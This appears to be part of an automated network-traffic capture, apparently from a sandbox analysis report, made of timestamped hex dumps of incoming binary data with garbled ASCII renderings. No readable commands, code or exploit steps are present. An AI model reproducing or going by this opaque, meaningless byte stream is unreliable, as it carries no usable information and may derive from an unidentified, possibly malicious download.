                                                                                                                                                2022-09-29 12:51:37 UTC15429INData Raw: c0 93 a3 c4 cd 69 f1 e2 00 ab 6f 5f 63 82 0e d3 8f 8f 00 55 3e dc 29 31 a6 29 fe 88 ac 6c 57 17 dc 4f 49 fb b1 dd f3 e3 50 b9 08 33 15 47 b3 3b 26 19 09 74 70 47 7f 86 43 46 86 8b b7 e7 f5 de 30 04 cf b4 37 76 d6 36 dc 3d fa a4 d5 e4 d3 5b 7d 9c 31 db 1d 45 58 b0 77 1d 3d b7 e8 f3 9e 83 7e 94 5c 14 f0 e2 d0 50 f7 be de 6c 94 79 20 2e 3f aa 88 cd 90 c7 72 bc ea 6c f8 f2 df 46 b8 cb e8 0a 88 67 c4 a9 97 d6 1b bf a7 16 03 1c 3c f6 c0 ba fd b7 15 45 24 7e a2 bf d2 0a 09 40 ac de ab a3 94 fc 9f d0 8d 10 f5 45 93 94 ff cf 52 69 70 d3 89 64 36 1a 67 dd 76 66 66 56 d6 69 b7 e2 77 ec 69 03 d2 f5 57 3f f8 d1 67 88 79 4c 78 b8 fa 32 4d 20 11 fb 75 46 e9 01 2b 32 99 ca 84 09 fb fa 4e 99 a7 b3 6a 85 cf 5e 46 4e e6 52 67 27 cd a3 5c 29 53 89 b0 af ef 9e 5d 9a 80 08 71
                                                                                                                                                Data Ascii: io_cU>)1)lWOIP3G;&tpGCF07v6=[}1EXw=~\Ply .?rlFg<E$~@ERipd6gvffViwiW?gyLx2M uF+2Nj^FNRg'\)S]q
                                                                                                                                                2022-09-29 12:51:37 UTC15445INData Raw: 5f 02 f6 ba 16 6c 18 a2 28 2b 5c b1 45 63 ce e0 d3 c0 90 53 ef 82 c6 a5 9e d2 f2 d4 62 13 c9 0f f6 a2 da ff 35 7f e3 cc 1c 95 e2 ad 8d 32 7c 84 2f ef 94 4b 56 a9 88 ae 72 a8 55 3c 0f 63 cf 95 92 09 18 78 a7 55 42 57 ae de f0 5a d2 cd 53 c0 66 51 d5 32 7f fa c6 f0 0a 55 92 50 a9 98 55 3c 00 cf 08 0c 15 a5 6a ae 35 b5 8c e9 39 86 e8 4e 91 dc 2e 90 b4 06 79 f8 96 3f bc fd 6f 47 04 65 7d 04 c6 85 7f 05 09 ce e0 d5 c8 61 5a d4 65 d9 25 ba f5 66 aa a2 c4 b5 e0 03 1c 51 97 60 c7 4d ae 94 26 24 fa 1f 64 ef eb bf 21 9d 8b 49 62 58 82 29 c3 2d 7b 4a b3 57 8e 34 2e ac 62 1e 15 a1 9f d5 3e 04 d0 86 dd b4 bd 41 97 3b 5c af e4 ca 23 cf 3a a9 dc 89 d7 fa ab 2a 96 5e df 77 70 c0 89 49 7b 28 28 79 14 09 5d e7 ec 6d d3 5d 8c cc 82 3a 34 d6 5b f8 c9 4b 36 f8 b0 02 46 f1 b7
                                                                                                                                                Data Ascii: _l(+\EcSb52|/KVrU<cxUBWZSfQ2UPU<j59N.y?oGe}aZe%fQ`M&$d!IbX)-{JW4.b>A;\#:*^wpI{((y]m]:4[K6F
                                                                                                                                                2022-09-29 12:51:37 UTC15461INData Raw: 0b 2c cd b3 99 f4 dd 1b 7c 66 bf ec fb 33 ce dd ec 85 3c aa 1c a3 35 c6 02 5f 46 05 9f 13 fc ea 95 a1 63 98 f0 f8 28 17 a6 17 f0 08 9a 1b a4 55 56 b8 60 ff 3d c9 9f 70 2c a4 17 db 14 1e 0f 3c f6 c3 1e 4c 19 63 f7 38 23 31 8a 72 47 28 b2 7b 9a 12 29 14 05 7d 79 3e 13 5f 09 61 de d3 7c 87 29 b1 68 65 ac c0 dd 88 7e 55 35 e8 56 e8 1c 09 7e 63 e5 cc b6 2e 17 b5 48 fc 49 17 f7 14 69 60 ac 55 56 af 0d 88 62 b7 97 34 7c f8 c0 20 32 e9 22 b8 9f a6 b5 90 db 48 eb e4 60 77 20 b8 84 48 1f 30 02 65 49 52 3b 43 10 fa f4 59 bc f2 bf d9 32 45 5e 16 52 6d 0f f7 2c cd c8 f5 7d 5b b0 67 8f a7 e1 b6 ff 25 b6 78 b3 d4 0f c4 ff d4 37 18 01 a9 37 44 24 dd 24 ff 96 27 cc cf 8a 37 23 5a 27 5a 2f 0b 02 42 f1 6d 74 07 86 f7 40 9a 67 8d 24 d5 d1 df ca c2 60 82 f0 75 f1 7b b4 55 9f
                                                                                                                                                Data Ascii: ,|f3<5_Fc(UV`=p,<Lc8#1rG({)}y>_a|)he~U5V~c.HIi`UVb4| 2"H`w H0eIR;CY2E^Rm,}[g%x77D$$'7#Z'Z/Bmt@g$`u{U
                                                                                                                                                2022-09-29 12:51:37 UTC15477INData Raw: 10 30 a6 ef 2f 74 bc 47 cb 9e 34 94 d7 3e 5a 0a 2e 03 69 aa ca a8 85 22 e2 79 5e 6d 81 dd d4 3f 64 e9 79 8a 30 37 ab b1 77 bc a7 b8 08 79 26 9d 32 e1 8f 6f 0d 10 c2 23 eb a9 cb cb 22 6c 6c 00 43 d7 82 a3 b3 04 a3 1b 20 17 06 1b 96 ac a1 e9 c7 30 09 01 14 f2 1b 71 8c 32 42 9f 3f e0 89 7c 5d 0d d3 9a 3e eb 10 8e 7f e9 55 04 14 f9 ed ed cb c0 a7 38 fc c5 8c 12 4b 37 26 32 24 41 9a 62 6c 99 7f 0c 5b 7d cb 16 c1 af b0 7d f4 e8 22 7a 90 73 5b 6b 8a bd a3 c6 47 1f 41 21 2b d8 15 87 90 eb 1f 37 59 a8 f8 8a 57 2e 98 ba 13 47 1e e0 8a 35 a6 77 3e c2 1f 72 28 d8 d6 86 d2 b1 b2 9e 57 c3 ba e5 49 83 71 21 df be 3c d2 8a a5 bd 52 55 72 4b 4e 48 fc 0a e8 a2 88 d4 99 7f ca ab 27 a3 5b a0 0a e0 29 fd a5 75 11 ca b2 8f f6 86 11 e1 71 5a 7c b3 06 cc 66 7b 01 b2 00 78 73 51
                                                                                                                                                Data Ascii: 0/tG4>Z.i"y^m?dy07wy&2o#"llC 0q2B?|]>U8K7&2$Abl[}}"zs[kGA!+7YW.G5w>r(WIq!<RUrKNH'[)uqZ|f{xsQ
                                                                                                                                                2022-09-29 12:51:37 UTC15493INData Raw: c9 14 2d 1f 74 db fd bc 09 aa 48 00 df d9 99 1c 89 9d 94 de fb fb 9c 27 a5 a0 7c ba 4a 9a 89 02 38 3c f1 8b 7e 17 3d 93 00 0e ef 5a e2 48 8f 56 5c 13 66 7c e8 98 13 1c 16 34 c9 d4 5e e6 fb c6 57 05 16 8a 86 3c 2b 48 5a 39 44 06 03 31 49 d2 44 47 9e de c8 41 ac ce 3e 06 a8 b1 3e 65 49 b4 d1 93 31 e7 60 ef f8 77 1b 53 67 08 6c a4 9e 4b fb 9e e1 5c eb de 82 22 3b 2d 22 9f c9 9a 0c 7b 20 22 ff 91 53 4b 82 c1 bb 8e f5 68 c5 ef 85 a9 87 53 6e d9 b6 8d 0d 09 33 55 f0 65 ad 5a 6e ac 49 e3 02 99 be 04 1c 76 25 03 cd d6 81 c0 91 80 25 d9 32 6d 20 07 a3 19 70 b7 13 81 61 3f 60 b8 86 34 ee 71 b1 c1 e6 61 b4 f2 31 ba 88 96 53 f2 e6 bf 3e ba 64 20 e4 19 29 2d 88 2e db 26 e3 54 d0 b8 e1 16 52 8e 96 0d 30 89 d3 ca 31 67 cb 55 bb 70 a7 6e 2d 9a 68 68 ff f4 27 df f1 c3 fb
                                                                                                                                                Data Ascii: -tH'|J8<~=ZHV\f|4^W<+HZ9D1IDGA>>eI1`wSglK\";-"{ "SKhSn3UeZnIv%%2m pa?`4qa1S>d )-.&TR01gUpn-hh'
                                                                                                                                                2022-09-29 12:51:37 UTC15509INData Raw: 40 ca b7 f6 43 31 5b d6 87 55 11 4a 2e e1 3e 8b c5 f8 aa 26 21 d6 55 07 c4 ce 5f 88 ea 02 37 a3 a2 44 17 40 2a ab 77 4b ca 25 43 c9 47 20 0d 63 61 74 41 c7 1b 3c ce 42 ce 54 60 aa d3 e5 45 5c 58 1a 4b e6 04 37 42 1e dd d1 7c 92 d3 a3 c3 63 ed 47 49 bc 7a 2b f9 5f 19 02 67 e3 63 1a ed 48 cf aa b7 6e 7c c1 60 23 49 b8 e5 f8 4d ed e9 41 18 62 2f 15 c6 28 44 a8 44 59 0d 65 d4 88 fc 72 8b 95 59 d4 28 19 e1 ab 8c 80 7d a3 3a 34 7d c0 79 9b 98 82 c2 f2 02 01 1a fd 62 0f cd df 5e 25 61 cf 25 7f 6d 40 43 ba e7 34 e9 e6 f2 20 eb 99 50 bd 91 93 53 98 f4 76 0b df 7e 81 59 4e d6 5b 46 4c d3 a7 a7 9d ce 78 71 bc 1e ff 3b 76 e6 1f cf 6c 9b 3b 24 33 af f9 02 18 75 0b c9 19 19 4d df 5d 5e 53 7a fc c0 50 c8 d3 4a 73 0a d3 7e e9 9a fb cd 7c 27 c8 8b 49 ed de e5 43 4f b2 63
                                                                                                                                                Data Ascii: @C1[UJ.>&!U_7D@*wK%CG catA<BT`E\XK7B|cGIz+_gcHn|`#IMAb/(DDYerY(}:4}yb^%a%m@C4 PSv~YN[FLxq;vl;$3uM]^SzPJs~|'ICOc
                                                                                                                                                2022-09-29 12:51:37 UTC15525INData Raw: b6 df 6f 2e 3c f9 2f 76 62 88 fe 58 05 19 af 02 67 05 b5 1f 41 78 ea 20 b5 2f 32 6d 8b e0 6d ba 4b 91 c9 38 d5 28 03 93 0b d3 09 eb 1b 16 3a e6 42 17 f9 cc 64 7d d8 e1 85 d6 f6 d4 39 c9 3d 59 2f 25 8d 70 9d ee 30 a3 8c db f0 5c 53 b2 bf 95 02 67 ad 06 ed ee d2 27 26 eb 22 9e d4 b3 15 72 bf 5c 18 e6 d7 12 86 53 41 36 73 c1 62 d0 b5 8c df ef d1 b2 07 ac 1e 05 71 7d 2d df f8 cf 40 a9 6d a6 ee 93 ed f0 27 bd 19 f1 70 38 5c 3e 31 fc 9f 8c d3 80 15 8d 05 0e bd 8f 7f 30 6c 8d 5c 38 e1 85 3f 3f ef 4b 0a aa 09 2d 6f 88 07 66 9d 19 fe 12 e3 e1 6b 03 c8 c9 bd f0 47 66 eb 05 e7 10 2c e2 d8 a0 28 01 ee a0 69 3b 8c 3b 53 b1 36 17 98 c9 66 b1 59 7f 01 fd ac 95 db fe e7 da 67 f6 49 dc ad 8e 78 a0 24 b3 ef 4d 3e 30 f1 fb e4 26 9c 12 cb 3c 8b c0 fa 6a 12 ca 46 53 57 f1 7c
                                                                                                                                                Data Ascii: o.</vbXgAx /2mmK8(:Bd}9=Y/%p0\Sg'&"r\SA6sbq}-@m'p8\>10l\8??K-ofkGf,(i;;S6fYgIx$M>0&<jFSW|
                                                                                                                                                2022-09-29 12:51:37 UTC15541INData Raw: a8 19 16 81 a3 8b df e5 99 ad 36 78 b0 8a 0c 69 a0 11 97 c9 71 6a 29 54 0a 29 45 10 b5 77 0d 0f 4f ad 23 5c bf 45 b8 5f dd 21 fd 4a 4f 41 fc 04 69 bf 6e 1b e6 bf b4 4b 3d 6b e0 b8 fd 3d 36 38 90 30 be 1f 17 de 39 5b b5 8d ac 26 77 7f 5b 86 f7 25 9b 1a 8a 9d cb 4e dd ec 22 f1 02 eb 91 6a b0 fa a2 94 4f ba 24 0b 83 e8 0d 5b 2a a2 8f b2 2a 8f 27 f7 a3 c0 23 29 18 08 72 f9 ca ff fa 00 23 13 f4 38 33 7a 88 dc 7f a6 64 60 82 69 41 f1 ba 12 f8 22 a1 26 1c c0 79 c7 70 52 61 e5 a0 d3 86 cb 1d 3b be 5d 57 c0 41 de 57 c9 51 60 cd fb 86 58 53 83 f3 c1 9d 3a 12 5d 65 42 42 85 7b 5d 67 54 a8 33 e5 94 92 7c e9 e4 81 ea 7f dd 5d a9 33 d8 9c c3 1e 11 e8 e0 50 55 a7 c6 31 06 b4 ff 14 98 1f 0b 0b 0e f1 f4 b4 e7 47 71 e7 38 45 d1 36 f2 73 a6 ed e7 9d af 9e 60 05 f9 0d 87 8e
                                                                                                                                                Data Ascii: 6xiqj)T)EwO#\E_!JOAinK=k=6809[&w[%N"jO$[**'#)r#83zd`iA"&ypRa;]WAWQ`XS:]eBB{]gT3|]3PU1Gq8E6s`
                                                                                                                                                2022-09-29 12:51:37 UTC15557INData Raw: ac 6f 71 85 fb 95 c0 d2 d1 4d 2b e6 56 69 f5 73 98 11 e9 7b 9c 72 63 61 10 81 25 dc 54 79 4f c8 e0 15 56 36 ff 53 d4 73 32 ec 08 64 4b 0f ef df 3f ee 9e 2e 07 11 70 48 75 15 ee 5e d6 c7 e6 6f 4a 54 39 b1 4d ab 3b 9e 30 47 e8 f5 76 46 93 ae bd ca 21 88 d3 58 54 ff d1 39 47 14 ad 93 77 85 d3 94 5e fe 29 15 42 4b f6 1b 62 23 49 93 42 e2 f9 4b 17 32 19 e0 bf 2a a9 2d 42 96 4e b6 80 a3 81 96 a7 f9 f0 9c e7 f9 cd 3e 13 3d e3 ee ae 76 2d 44 7e 3a f3 83 bb 47 d0 f3 e7 e1 43 06 32 13 9e 26 1a b5 22 43 43 ba a9 da 62 03 1a 6c c8 68 e3 7d 1c cb 5b 69 86 7b ad 79 9e 5b 40 5e e8 f2 06 67 5b 41 46 2e 7d 49 40 f7 71 8a e3 8c bd af 80 c6 63 d4 70 3d 96 02 81 db a5 a4 b8 1b 0f c5 0a ae cb 39 1c 07 94 c8 3d 7d ba 78 df 0e 76 28 a0 da fd d1 d7 3f 7c 7c 00 1d c8 bf d5 a3 3c
                                                                                                                                                Data Ascii: oqM+Vis{rca%TyOV6Ss2dK?.pHu^oJT9M;0GvF!XT9Gw^)BKb#IBK2*-BN>=v-D~:GC2&"CCblh}[i{y[@^g[AF.}I@qcp=9=}xv(?||<
                                                                                                                                                2022-09-29 12:51:37 UTC15573INData Raw: 4b 49 7a b4 2f a9 5f 2c c4 bb 9e 86 b1 ec d8 d7 b5 e3 77 f2 3d f8 54 9f 13 a1 d6 16 29 3b ae 0f 67 12 c5 25 e4 6d 35 e6 8b c2 9a b1 e1 97 3c 6e 0b ff a5 65 64 f3 44 fd a8 d9 59 d8 1b ee c2 d1 0a e6 ec 5f 91 e7 da 75 be 0a 72 c1 73 18 2b b8 ad fd 9a 25 e4 03 fe 3a 54 d6 85 e7 b5 c4 bd 6f f1 ff 60 1e fc 43 8d 8b 40 44 d7 e0 6c ab 2b f1 b4 9b c1 41 77 43 33 ad be 6a 3c bb 1d b5 b3 6a 3a 04 93 be df 15 e6 45 03 44 d0 d7 06 de 0d 06 34 c1 46 37 7e 7e de 7d 26 54 b7 11 02 54 4d c5 49 6d 84 d0 3b fb ce cc 71 c7 6a 18 25 ef 8f 09 0b 1e 38 e4 db fa bc 7c 6a fc 59 ad 9e 2d 1c 68 e5 37 32 31 57 3d ed 51 cf 7d 96 f0 ef 36 d9 74 9e 25 75 cf 78 55 40 d5 26 12 34 6f fe 20 f5 ee 2c 2d 2e c0 13 ec 44 a7 96 76 8a f1 72 51 e9 aa 2d 6d e3 6f 37 1a 70 39 db dc 13 7c 36 9b 39
                                                                                                                                                Data Ascii: KIz/_,w=T);g%m5<nedDY_urs+%:To`C@Dl+AwC3j<j:ED4F7~~}&TTMIm;qj%8|jY-h721W=Q}6t%uxU@&4o ,-.DvrQ-mo7p9|69
                                                                                                                                                2022-09-29 12:51:37 UTC15589INData Raw: 03 7f 94 9b 06 dc 03 d5 aa 7e d0 ee e3 b6 2a cb bf 3b 52 36 bc 93 a9 5e 98 a3 30 3d 83 86 10 87 7c a8 1e f6 73 ad c6 a4 4c 95 1f c1 de 97 68 d6 de 7f 6e 45 3b 37 83 30 37 50 54 78 39 7f 93 91 80 34 3b 45 83 d3 33 74 b9 d5 dd ae 01 2f 98 9e 0f e3 a5 38 ce 71 9f 8d ae 82 88 06 8d 7f 8a a5 43 a5 67 ae 46 19 36 d2 13 29 3d 94 7a cc 7c c9 1c a0 2b b0 3b 8e b7 51 0d b2 69 f3 44 3f c0 a2 c7 b0 d1 5a e7 90 9c 9c ce eb 03 cd eb 23 81 3a a5 b4 ed e7 fc 0c 14 c1 05 cf 77 f4 ca 84 99 ab 52 7d 36 fd c3 6c 6d 86 28 72 84 d5 a7 1b b2 4e 4f 65 9a d8 10 c8 4d 84 d5 00 92 f5 f0 7f f0 dd ae 30 56 a1 ac 84 4c 7d 2d f9 71 20 39 8d 1f 5e 80 e2 bb b5 25 dc e8 09 71 4a c1 c5 e8 51 92 0d 8e 89 c0 9b 20 5e c7 f3 73 a3 25 c5 ba 53 d8 97 73 4d 5d 0a 13 a1 12 62 13 54 41 0b 18 a3 9f
                                                                                                                                                Data Ascii: ~*;R6^0=|sLhnE;707PTx94;E3t/8qCgF6)=z|+;QiD?Z#:wR}6lm(rNOeM0VL}-q 9^%qJQ ^s%SsM]bTA
                                                                                                                                                2022-09-29 12:51:37 UTC15605INData Raw: 50 cb cf 80 04 05 0e 9e 1c d6 68 07 9a cf e8 7e f7 a2 24 1d 09 b4 ea d3 a3 3f 22 af 4f 44 cb 5e 26 05 c2 0c 1b 12 1b 66 aa e1 4a ce 50 25 aa f2 e3 2e 81 2d c5 e7 b1 98 36 99 23 43 21 e7 f4 3d e2 c1 3b 6b 04 1d e3 45 77 a7 5f da c3 93 e6 dd 20 1f 47 6a 94 27 e6 d6 a0 7b db 5d 38 98 1f 62 9c 33 c9 d8 b3 b0 78 3f ed e8 e7 12 85 dd eb 70 e7 08 5f e7 55 34 50 d0 99 0f 2f 43 54 60 45 77 bc 1c 0f b2 70 30 ea 49 6c aa 0d 7c 56 8f c1 5c fa 0e e2 15 1e fc 09 99 f1 c6 58 ea 88 72 ea ae 4e f3 01 32 72 50 54 fd ad 5a 69 da b8 d5 16 9a 25 2e dd ef 36 01 d5 70 2d e4 1d 65 b6 62 57 b3 f9 22 de 7b 4d 99 e1 ff 55 99 3d 23 7e dd c7 bf 34 33 a5 c5 c4 50 ff b9 fd ce dc 94 01 80 e5 46 74 d9 a9 02 54 fb eb 1f 69 73 27 49 07 84 79 68 a5 50 f1 8b 0b 2a 99 e7 d0 12 8b 8b f5 78 7f
                                                                                                                                                Data Ascii: Ph~$?"OD^&fJP%.-6#C!=;kEw_ Gj'{]8b3x?p_U4P/CT`Ewp0Il|V\XrN2rPTZi%.6p-ebW"{MU=#~43PFtTis'IyhP*x
                                                                                                                                                2022-09-29 12:51:37 UTC15621INData Raw: 6d 18 e6 17 96 f5 9a 7b b3 65 95 30 ae 52 4d c3 9a 86 4e c9 33 11 7d c6 8d ce 25 7e 1e 4a ac b0 07 86 e8 cd 36 a1 59 f1 c2 24 31 d9 fd eb 3b 88 2a 2a c3 ef 75 80 57 cb 94 a2 08 9c b4 5f 1b 5e 95 ef db fd 79 ae f6 3e ce 88 ab d2 bc 1d 59 a3 5f fa 18 2d a1 42 ec 35 7a 4d 86 db 64 6a eb 9d 0b a0 a2 50 84 ca a9 78 76 2f d6 78 2c 67 48 5e 8a 12 37 37 e5 d3 54 79 47 e8 69 eb 70 8a be b9 ef 6d 4e d2 e6 54 05 47 c9 87 31 7c 0e fc a0 3f 50 21 75 62 09 8a 70 e9 dd 20 aa 04 78 d2 44 8b 5b 5f 77 dc ad 7c 1e ce 77 ee 09 7e 65 b0 e3 f3 f2 ff fc 90 fa 8a 16 a0 1a 5e f0 d4 88 e2 50 82 c0 de 06 e0 7f c1 0f 85 9c 6b ba ca 29 9b f5 25 39 37 c3 9c 5e 51 38 0a c4 89 2b ce 06 c0 49 81 84 6c a6 b8 ac 06 c0 ac 16 23 d4 63 3e 97 73 ff b3 b1 3b 54 c3 68 14 fc 34 5a d4 e1 a8 ad 48
                                                                                                                                                Data Ascii: m{e0RMN3}%~J6Y$1;**uW_^y>Y_-B5zMdjPxv/x,gH^77TyGipmNTG1|?P!ubp xD[_w|w~e^Pk)%97^Q8+Il#c>s;Th4ZH
                                                                                                                                                2022-09-29 12:51:37 UTC15637INData Raw: 9e 20 88 a6 d3 31 5f d1 7b bf 42 3f 9e 1c 19 ab 6d 4b 13 fa 74 a5 df 46 5b a8 b2 89 91 d9 c0 2d ed 47 ab c0 58 1d d6 95 a4 91 6f c0 68 4f ea 9d fd 33 ee 44 08 79 7c 97 77 92 60 74 de d6 0b 51 7d 3d 0e 3d 91 2e f1 e9 f7 bd 75 a7 cf 63 50 4a 87 91 67 02 b7 f1 5e f9 68 52 1f 6b ab 0b bc 57 20 ae e3 63 c2 35 c2 b8 25 35 35 fb 54 4b 9b bf b7 f3 d4 fe 07 2f 57 45 28 3f 68 52 ab 4d 41 73 82 3d b7 27 7a a7 88 03 8d f6 79 f9 ff 16 fe 2e 09 71 55 86 2f b4 43 0d 39 fb 10 8d a6 b5 29 50 68 54 73 c2 f0 e2 f6 e7 3b 88 c6 2c 21 37 9f 52 a1 76 c0 36 81 fc ce 82 f0 55 45 fd 36 42 11 c0 71 66 ce 05 e2 75 fd 7a 14 f1 f1 3a ed 45 2f 76 50 6f 00 4d c9 00 dd 64 e7 c9 51 2c a1 48 af 1e 27 8b 02 27 92 b3 9e 8a 9d 17 92 b1 4c 49 88 2f 09 4e d9 a2 d8 64 9a 5c d2 46 98 da 06 7f bc
                                                                                                                                                Data Ascii: 1_{B?mKtF[-GXohO3Dy|w`tQ}==.ucPJg^hRkW c5%55TK/WE(?hRMAs='zy.qU/C9)PhTs;,!7Rv6UE6Bqfuz:E/vPoMdQ,H''LI/Nd\F
                                                                                                                                                2022-09-29 12:51:37 UTC15653INData Raw: 6f 8c 3f 12 53 cb 12 ba cf 99 c1 f1 d7 1c e8 ae 89 8f 62 5f ab 30 3b 3e b1 77 f1 72 aa c1 d6 4c c2 09 75 f8 9e ad 1d 14 98 f3 22 1a 85 5a 61 52 00 97 67 9c f7 e3 4b c8 58 6e df fe 42 db e8 74 9b 24 d9 c7 12 85 bc 2e 53 12 a8 28 1e 2a 01 92 73 88 cc e7 19 be fa cf c3 62 45 99 0d 25 c5 ba 80 5b 7c a4 1d 0f 15 a7 7b bb a3 68 8f c2 a5 cd a7 89 1d 4a 13 7f 6d 8e 36 1b 6a 8d 3b 18 6d 3c 04 1d 6b 3f e4 c1 06 ad 2f 8b fc 44 67 3f ca df ba 83 e4 bb a1 14 da 01 6b eb 2b 7d d4 0f 44 4c b2 e8 fc 8f 2b 6f 2d 91 92 eb f2 08 e7 75 c6 56 d2 1a 89 dc 2d fb 01 3b ee 96 c6 e8 e3 df 48 54 e7 d3 5b d2 05 b0 6e 99 1a f2 23 78 2a 03 0e fe 55 c5 37 1f f1 64 da 86 7c 16 bc 27 61 5a 80 2f 51 52 75 62 59 d2 18 b0 13 12 04 47 3b 0f 00 0c 1f f8 81 d0 4c 67 ca 45 e0 5c 2d a6 3a 06 46
                                                                                                                                                Data Ascii: o?Sb_0;>wrLu"ZaRgKXnBt$.S(*sbE%[|{hJm6j;m<k?/Dg?k+}DL+o-uV-;HT[n#x*U7d|'aZ/QRubYG;LgE\-:F
                                                                                                                                                2022-09-29 12:51:37 UTC15669INData Raw: 6e 76 6a dc dc c8 36 1a 16 88 75 d3 04 37 5b 71 7f 41 66 83 0c 7b 97 c0 fb 9d 72 b1 56 67 51 32 17 2a 49 f9 0f a0 77 3d f7 ee 99 10 24 7a fc a1 3b 00 9e b2 e6 1b 0b 07 5b 4b 5f 56 ae 37 ee 16 45 a2 e2 1c 74 6c 9e f6 7e 8d 93 48 14 80 bc e8 65 5e 61 b8 a0 1d a1 fb 4e 0d dd ef 0a c3 79 d2 9e 3f 93 cd 5c e0 09 1e db 3a 14 69 cf c6 0c 68 4e 1e e6 af 31 9c f1 3d 9b 19 6c 02 78 75 5a 71 cd d3 9b 9a c3 e2 90 d6 08 69 f5 50 a0 df 56 bb 50 e3 23 1a 80 c2 5f 61 24 21 3f e1 b4 ec 1c 12 3b 29 ca ee 31 5a 46 c9 1f 4c cf cf 16 34 c7 52 b9 8b 76 6d 21 4c 62 47 c5 05 45 3f 1b c0 32 a2 b2 41 62 9b 5b b4 a5 e4 7f 3a 1f b4 39 b4 c1 a9 40 bc 85 9f 0f 89 ad 98 40 51 5d f3 dd 6f 46 1a 82 3b 46 62 28 60 3b 82 b1 41 ff 50 e4 b5 a4 11 40 17 90 c4 b6 5d 15 b7 03 30 33 5f 65 5a 50
                                                                                                                                                Data Ascii: nvj6u7[qAf{rVgQ2*Iw=$z;[K_V7Etl~He^aNy?\:ihN1=lxuZqiPVP#_a$!?;)1ZFL4Rvm!LbGE?2Ab[:9@@Q]oF;Fb(`;AP@]03_eZP
                                                                                                                                                2022-09-29 12:51:37 UTC15685INData Raw: 80 43 25 d3 e1 d7 9a c8 52 ee 81 a8 14 e8 47 f6 7f 73 69 92 7a 6c 68 a9 fc 27 a0 23 02 71 bf bb 14 e4 44 b7 27 e5 11 48 75 0b 84 f8 3b 5c b0 6a ef 9c ae 62 03 25 ab 2e 74 ec 51 f0 d3 62 af 4c fc 09 5e 8e 52 4f ab f5 71 16 85 50 59 c2 e5 79 18 87 89 20 b0 d7 0a 2e 0b e6 76 80 44 f1 8f c8 08 e4 d1 73 8e ae 1e 7d fb af f5 6f 5f 91 f4 88 eb 05 6f 26 81 98 0c c4 c4 0b 51 30 9a 89 87 eb 3b db bb 96 12 d4 a4 eb 47 99 77 9a 8a 01 2a 2d 44 39 bc 33 21 2b f8 41 ec ec c8 65 4b e6 98 5a 04 c2 59 11 1b 2c 62 a5 c1 d3 19 5b 60 39 26 dd 56 c3 f3 4c 46 05 9c c8 5b 19 68 be 9f f5 f7 61 21 15 b2 72 ce 0b e1 6c 04 31 1d 8b 2c 2e 1a d1 25 cf 2c de 05 8c e9 0c 66 79 30 35 42 db 8c be 6d a6 c1 a8 3b d4 28 fa c8 8a 37 e4 1b b2 bc c7 42 3e 9c 80 5f 43 03 18 19 f0 9d f7 39 c4 ef
                                                                                                                                                Data Ascii: C%RGsizlh'#qD'Hu;\jb%.tQbL^ROqPYy .vDs}o_o&Q0;Gw*-D93!+AeKZY,b[`9&VLF[ha!rl1,.%,fy05Bm;(7B>_C9
                                                                                                                                                2022-09-29 12:51:37 UTC15701INData Raw: 70 06 b2 ba 06 d0 07 6b 5d 07 24 59 73 e1 13 62 82 4a bd 75 d0 51 99 8f f5 c7 cb cb 69 7c 9d ff 4f 37 ad 37 9e 5c 71 bf 20 ec 79 2b b3 16 cf b3 c6 18 00 32 ee 51 82 13 e4 27 eb bb c8 d1 97 fd 1d b0 f3 d1 67 f1 cb 81 32 2f 94 bc ca e2 35 98 b0 23 ee c8 2b 06 7c 92 18 9b 7c d1 d9 27 08 74 da 74 30 8e e4 97 5e e9 5d 05 27 36 4b a3 37 df ae 41 fa a4 5c b5 18 5c 6a c5 42 37 55 b2 48 be a4 c1 88 c6 9d ff 96 3a 68 7f 37 39 86 82 4d d5 69 e4 90 84 59 60 8f e2 61 87 6b c4 60 40 f0 02 83 01 bb c7 85 44 87 fe 67 11 00 7a cb df dd 5f 0e 4b 4a df 40 99 ab ea 29 25 19 64 ef e6 9b fa 49 14 65 00 c0 ac e7 6b 0a 29 4a f5 80 1e 71 7c 7e 7a 9c 01 e8 3a 71 2e 70 d7 0b 6e 8e 04 e2 e8 a6 58 fd 41 82 58 21 7d 45 bb a8 f0 87 21 33 b1 77 f9 fd aa 0c ae f4 8f b7 2b f5 a3 73 0a 64
                                                                                                                                                Data Ascii: pk]$YsbJuQi|O77\q y+2Q'g2/5#+||'tt0^]'6K7A\\jB7UH:h79MiY`ak`@Dgz_KJ@)%dIek)Jq|~z:q.pnXAX!}E!3w+sd
                                                                                                                                                2022-09-29 12:51:37 UTC15717INData Raw: e5 b8 01 36 79 c0 73 f5 de f9 17 79 1d 7e 2f 47 7d 8c 39 c0 fe 57 f4 20 58 79 a1 e7 86 6a 59 97 a1 36 fd 6f 60 93 1c e6 a4 e1 55 0d 2b 17 f1 f0 fb 5f 96 c4 fb dc fd eb 3d 5b bd e4 0c 23 b7 14 76 a1 84 6c ef 5d 64 32 5d 99 7b 01 aa b6 ab 89 de b4 9a ab 02 2c 19 fc 1f 29 14 12 d6 68 a2 7e 31 89 d6 02 12 78 2c a1 1f 1c 17 b4 c7 ae 38 ac 2f 08 77 33 c5 06 5d aa bc dd 06 80 e4 e1 30 8b e2 16 d3 40 e0 02 7b 80 a6 6b b8 4f f4 63 d9 82 49 5b 92 33 cf 06 16 bf 66 ef c8 55 a4 e3 de ea fd c2 f9 08 25 38 e9 09 3c b7 74 3d f4 9b fb 38 b4 19 f7 16 5c cc 1b 13 35 37 c6 29 11 01 94 9b e5 f4 ff 1a 01 fa a3 7e 92 d9 42 82 28 55 24 a9 79 7c 53 61 d6 c9 6d d7 63 38 7d 2b 83 ae ac a4 ec 03 9d 3c cc c7 f0 05 f3 ce fa 27 5b 55 fc e9 26 a7 21 57 3e 9e b2 68 80 a8 1d 88 5b a2 5e
                                                                                                                                                Data Ascii: 6ysy~/G}9W XyjY6o`U+_=[#vl]d2]{,)h~1x,8/w3]0@{kOcI[3fU%8<t=8\57)~B(U$y|Samc8}+<'[U&!W>h[^
